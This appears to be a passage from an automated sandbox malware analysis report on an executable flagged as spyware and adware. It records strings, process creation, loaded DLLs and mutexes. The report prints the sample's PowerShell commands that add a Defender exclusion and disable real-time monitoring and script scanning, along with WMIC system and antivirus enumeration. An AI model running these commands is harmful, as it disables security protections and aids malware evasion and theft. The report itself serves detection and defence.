              Source: powershell.exe, 00000012.00000002.2408109229.000002CB34C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drString found in binary or memory: https://gstatic.com/generate_204g==================Divulge
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
              Source: powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49787 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348926440_2_00007FFD34892644
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34894D930_2_00007FFD34894D93
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34891D8A0_2_00007FFD34891D8A
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD3488BE850_2_00007FFD3488BE85
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34894ED00_2_00007FFD34894ED0
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348981230_2_00007FFD34898123
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD3488108D0_2_00007FFD3488108D
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348962200_2_00007FFD34896220
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348981C00_2_00007FFD348981C0
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD3489A3390_2_00007FFD3489A339
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348914100_2_00007FFD34891410
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD3488F4300_2_00007FFD3488F430
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348970000_2_00007FFD34897000
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD348961580_2_00007FFD34896158
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD3488FA480_2_00007FFD3488FA48
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A426180_2_00007FFD34A42618
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A412550_2_00007FFD34A41255
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A52D750_2_00007FFD34A52D75
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A531B10_2_00007FFD34A531B1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4AB150_2_00007FFD34A4AB15
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4FB050_2_00007FFD34A4FB05
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4DF080_2_00007FFD34A4DF08
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4A0390_2_00007FFD34A4A039
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A533C20_2_00007FFD34A533C2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A513B10_2_00007FFD34A513B1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4ABAD0_2_00007FFD34A4ABAD
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A550FD0_2_00007FFD34A550FD
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4CCE30_2_00007FFD34A4CCE3
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A41C950_2_00007FFD34A41C95
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A425F20_2_00007FFD34A425F2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A509FA0_2_00007FFD34A509FA
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A41A550_2_00007FFD34A41A55
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A425900_2_00007FFD34A42590
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A52DD30_2_00007FFD34A52DD3
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4BDC10_2_00007FFD34A4BDC1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A50AF30_2_00007FFD34A50AF3
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A51B480_2_00007FFD34A51B48
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A48B330_2_00007FFD34A48B33
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4AB200_2_00007FFD34A4AB20
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A418480_2_00007FFD34A41848
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeCode function: 0_2_00007FFD34A4241D0_2_00007FFD34A4241D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348ABC7A2_2_00007FFD348ABC7A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A8E252_2_00007FFD348A8E25
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349766052_2_00007FFD34976605
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349730E92_2_00007FFD349730E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A484C5_2_00007FFD348A484C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A3F815_2_00007FFD348A3F81
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD348A820218_2_00007FFD348A8202
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD348A745618_2_00007FFD348A7456
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD348A3B2F18_2_00007FFD348A3B2F
              Source: apDMcnqqWs.exe, 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs apDMcnqqWs.exe
              Source: apDMcnqqWs.exeBinary or memory string: OriginalFilename vs apDMcnqqWs.exe
              Source: apDMcnqqWs.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: apDMcnqqWs.exe, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
              Source: 4z5ru.scr.0.dr, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
              Source: 4z5ru.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 4z5ru.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: apDMcnqqWs.exe, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: apDMcnqqWs.exe, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.adwa.spyw.evad.winEXE@27/22@2/2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\apDMcnqqWs.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeMutant created: \Sessions\1\BaseNamedObjects\sW7ROjkdVeQ0ALYye0hE
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile created: C:\Users\user\AppData\Local\Temp\G5kTuonXpDGStAtJump to behavior
              Source: apDMcnqqWs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: apDMcnqqWs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A74B000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A6E1000.00000004.00000800.00020000.00000000.sdmp, BjhcxNxxFR4N6Gf.0.dr, av2rxYk4uIkmjW3.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: apDMcnqqWs.exeReversingLabs: Detection: 87%
              Source: apDMcnqqWs.exeVirustotal: Detection: 78%
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile read: C:\Users\user\Desktop\apDMcnqqWs.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\apDMcnqqWs.exe "C:\Users\user\Desktop\apDMcnqqWs.exe"
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
